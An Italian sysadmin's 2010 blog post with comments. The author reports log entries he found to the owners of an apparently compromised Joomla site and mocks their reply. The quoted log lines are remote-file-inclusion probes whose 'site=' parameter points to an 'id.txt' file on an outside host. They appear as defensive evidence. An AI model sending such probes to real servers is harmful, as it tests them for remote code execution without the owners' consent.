Comments & Opinions |
Home Page | Comments | Articles | Faq | Documents | Search | Archive | Tales from the Machine Room | Contribute | Set language to:en it | Login/Register
Un paio di giorni fa, mentre mi stavo dilettando (per certi valori di 'dilettare') a controllare i millemila logs dei nostri sistemi ho scovato una marea di linee come le seguenti:
91.215.157.104 - - [13/Sep/2010:04:02:39 +0200] "GET /about-us//?site=http://www.rcpamanual.edu.au//language/pdf_fonts/id.txt??? HTTP/1.1" 404 13220
91.215.157.104 - - [13/Sep/2010:04:02:39 +0200] "GET //?site=http://www.rcpamanual.edu.au//language/pdf_fonts/id.txt??? HTTP/1.1" 404 13220
Ho quindi inviato una maillina ai manutentori del dominio indicato (rcpamanual.edu.au) informandoli che il loro sistema era probabilmente p0wned.
Ed oggi mi arriva una maillina di risposta che dice:
"lo sviluppatore del sito aggiornera' ad una nuova versione di Joomla che risolve parecchi problemi, ha controllato ed e' sicuro che tale cosa non ha avuto effetti nefasti. Posso sapere come lo avete scoperto?"
Ed io penso, nell'ordine: a) lo sapevo che da c'era di mezzo una PHMerdaccia da qualche parte b) mi sa che il "problema" e' tra le orecchie dello sviluppatroto e c) perche' io sono capace di leggere un fottuto file di log? Perche' se loro controllassero i loro fottuti files di log forse si renderebbero conto che ci sono un bazilliardo di richieste per files che non dovrebbero essere sul loro sistema... O no?
Imbecilli. Altro che CL.
Davide Bianchi
16/09/2010 09:00
Comments are added when and more important if I have the time to review them and after removing Spam, Crap, Phishing and the like. So don't hold your breath. And if your comment doesn't appear, is probably becuase it wasn't worth it.
By Anonymous Puzzled posted 16/09/2010 14:08
però quelle richieste hanno un 404, quindi sono richieste a file che non ci sono...
o mi sono perso qualche passaggio?
-- Anonymous Puzzled
@ Anonymous Puzzled By Davide Bianchi posted 16/09/2010 15:56
però quelle richieste hanno un 404, quindi sono richieste a file che non ci sono...
il 404 e' dovuto al fatto che il server da cui io ho prelevato il log e' TomCat, pertanto l'URL non viene richiesto. Poi spero che dopo due giorni gli imbecilli di cui sopra abbiano rimosso la fetecchia dal loro sistema, ma non ci giurerei troppo.
-- Davide Bianchi
By Nik posted 16/09/2010 18:32
ma tu gli hai risposto?
e se sì, come?
@ Nik By Davide Bianchi posted 16/09/2010 19:41
ma tu gli hai risposto?
Ovviamente. Gli ho detto che sarebbe interessante capire come c'e' arrivata quella roba sul loro server e che io leggo i file di logs, tutti i giorni.
-- Davide Bianchi
By FMblues posted 17/09/2010 13:06
Ciao, sono andato per curiosità sul sito da te indicato.
Nel footer della pagina è indicato da chi è sviluppato il sito, notare il link a cosa porta:
http://www.rcpamanual.edu.au/www.websitesaleslab.com.au
Il problema non è solo che è un php, ma chi lo gestisce non si è manco preso la briga di leggere manuale o guida del suddetto Joomla.
Maurizio
@ FMblues By Davide Bianchi posted 18/09/2010 10:56
problema non è solo che è un php, ma chi lo gestisce
Ma certo che il problema e' anche chi lo gestisce. Ma chi sa come gestire le cose credi che scelga la solita cagata che tutti scelgono?
-- Davide Bianchi
@ Davide Bianchi By Nik posted 20/09/2010 09:28
problema non è solo che è un php, ma chi lo gestisce
Ma certo che il problema e' anche chi lo gestisce.
Come si suol dire: "fra la sedia e la tastiera......"
-- Chronicles of a Broken Heart
By Sam posted 17/09/2010 17:53
Azz... Ti hanno proprio fatto girare, eh?
E' la prima volta che vedo scrivere al buon D nome e cognome dei personaggi! Ma quando ci vuole... ci vuole!
-- Sam
By Rggb posted 20/09/2010 09:19
"lo sviluppatore del sito aggiornera' ad una nuova versione di Joomla che risolve parecchi problemi, ha controllato ed e' sicuro che tale cosa non ha avuto effetti nefasti. Posso sapere come lo avete scoperto?"
:)
Ma scusa, potevi anche mandarli un po' nel pallone, tipo "ho un sw di analisi sviluppato in collaborazione di un team di ricerca della UCLA che è in testing anche presso l'ufficio federale investigativo sui crimini informatici USA, che avvisa istantaneamente in caso di segnalazioni sospette"...
-- Rggb
This site is made by me with blood, sweat and gunpowder, if you want to republish or redistribute any part of it, please drop me (or the author of the article if is not me) a mail.
This site was composed with VIM, now is composed with VIM and the (in)famous CMS FdT.
This site isn't optimized for vision with any specific browser, nor
it requires special fonts or resolution.
You're free to see it as you wish.